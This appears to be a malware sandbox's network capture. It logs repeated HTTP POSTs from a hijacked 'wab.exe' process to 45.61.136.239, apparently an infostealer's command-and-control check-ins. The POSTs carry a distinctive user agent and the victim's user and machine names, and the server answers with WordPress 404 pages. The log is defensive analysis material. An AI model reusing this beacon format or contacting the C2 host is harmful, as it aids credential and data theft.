                  Jul 3, 2024 09:41:58.415744066 CEST896INData Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65
                  Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
                  Jul 3, 2024 09:41:58.415756941 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:41:58.415767908 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:41:58.415781021 CEST1236INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:41:58.415791988 CEST1236INData Raw: 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72
                  Data Ascii: ,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--
                  Jul 3, 2024 09:41:58.415803909 CEST896INData Raw: 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e
                  Data Ascii: gin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-co


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.74971345.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:41:58.579061031 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:41:58.584146976 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:04.596893072 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:41:59 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:04.596916914 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:42:04.596931934 CEST448INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:04.596946955 CEST1236INData Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26
                  Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
                  Jul 3, 2024 09:42:04.596961975 CEST1236INData Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d
                  Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                  Jul 3, 2024 09:42:04.596976995 CEST448INData Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61
                  Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
                  Jul 3, 2024 09:42:04.597174883 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:04.597189903 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:42:04.597213030 CEST448INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:42:04.597672939 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.74971445.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:04.906637907 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:04.915460110 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:21.019000053 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:05 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:21.019020081 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:42:21.019032955 CEST448INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:21.020216942 CEST1236INData Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26
                  Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
                  Jul 3, 2024 09:42:21.020252943 CEST1236INData Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d
                  Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                  Jul 3, 2024 09:42:21.020263910 CEST448INData Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61
                  Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
                  Jul 3, 2024 09:42:21.020687103 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:21.020699024 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:42:21.020709038 CEST448INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:42:21.021147013 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.74971545.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:21.173938036 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:21.178997993 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:26.183410883 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:21 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:26.183471918 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
